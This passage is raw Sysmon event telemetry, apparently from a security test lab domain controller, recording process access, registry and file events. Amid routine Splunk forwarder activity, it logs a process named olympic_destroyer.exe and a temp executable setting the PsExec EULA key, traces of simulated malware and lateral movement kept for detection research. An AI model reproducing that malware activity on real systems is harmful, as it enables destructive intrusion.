Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000292807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.624{C8EA50B7-1310-6216-3406-000000003802}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000292806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.459{C8EA50B7-1310-6216-3306-000000003802}64685224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.459{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=CA6EAD9500987507D51D51621FE6B10C,SHA256=C7362EF6FE1E61B0683895AD505EAEB4E7541FB482300BC4EBB67D096E5934BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.175{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6389C5BD05E806153A28BF40C8D6E2F3,SHA256=8BA6929A4A6D40375FEB696D21FD548A4AF3FE0FE7B7B5367B2F029544671EE9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.006{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1310-6216-3306-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.006{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.006{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1310-6216-3306-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.006{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1310-6216-3306-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000292796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.008{C8EA50B7-1310-6216-3306-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:21.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A6D3F72E7CCCB30FF34487E1CAF363,SHA256=40C722C0015D8ED551BFC02950763ABCA34D7D4C032578269751010E9F60AFC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.875{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E704C6EC0A48F12091E30AC583664BE5,SHA256=99378E729EF640D0615B2B212B2B64921A7B8C583C86E785445FF9119C22D1B3,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000292891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.791{C8EA50B7-1311-6216-3B06-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000292890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:21.775{C8EA50B7-1311-6216-3B06-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.723{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3D06-000000003802}6264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.723{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3D06-000000003802}6264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.706{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A279E0712C6033714B64E6D034697E53,SHA256=3DBF1E3698F82A073BB6E3F64E5470F249D219129E0CA140D8769324F0FA77B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.691{C8EA50B7-1311-6216-3D06-000000003802}62641840C:\Windows\system32\conhost.exe{C8EA50B7-1311-6216-3B06-000000003802}6284C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.691{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.675{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.675{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.675{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.659{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1311-6216-3D06-000000003802}6264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000292880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:21.659{C8EA50B7-1311-6216-3A06-000000003802}5448C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.659{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1311-6216-3D06-000000003802}6264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.606{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3C06-000000003802}6148C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.606{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1311-6216-3C06-000000003802}6148C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.591{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.591{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.591{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:21.591{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 